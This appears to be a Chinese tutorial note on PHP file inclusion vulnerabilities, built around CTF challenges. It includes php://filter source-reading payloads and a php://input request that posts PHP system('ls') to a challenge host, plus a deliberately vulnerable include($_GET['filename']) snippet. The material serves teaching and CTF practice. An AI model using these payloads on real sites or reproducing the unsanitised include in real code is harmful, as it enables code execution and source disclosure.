WEB漏洞-文件操作之文件包含漏洞全解
WEB漏洞-文件操作之文件包含漏洞全解
演示案例:
Ø 本地文件包含代码测试-原理
Ø 远程文件包含代码测试-原理
Ø 各种协议流提交流测试-协议
Ø 某CMS程序文件包含利用-黑盒
Ø CTF-南邮大,i春秋百度杯真题-白盒
php://filter/read=convert.base64-encode/resource=index.php
http://e5369bfd1d9c4bc4af66983b843eb0f3760d8c19751b457d.changame.ichunqiu.com/?path=php://input Post:<?php system(‘ls’);?>
http://e5369bfd1d9c4bc4af66983b843eb0f3760d8c19751b457d.changame.ichunqiu.com/?path=php://filter/read=convert.base64-encode/resource=dle345aae.php
涉及资源:
https://www.ichunqiu.com/battalion?t=1&r=0
http://4.chinalover.sinaapp.com/web7/index.php
https://www.cnblogs.com/endust/p/11804767.html
https://pan.baidu.com/s/1x_mwVF—xxmoKAvDJ8mRsw 提取码:xiao
<?php
$filename=$_GET[‘filename’];
include($filename);
/
$filename=$_GET[‘filename’];
include($filename.”.html”);
/
?>
若有收获,就点个赞吧
0 人点赞
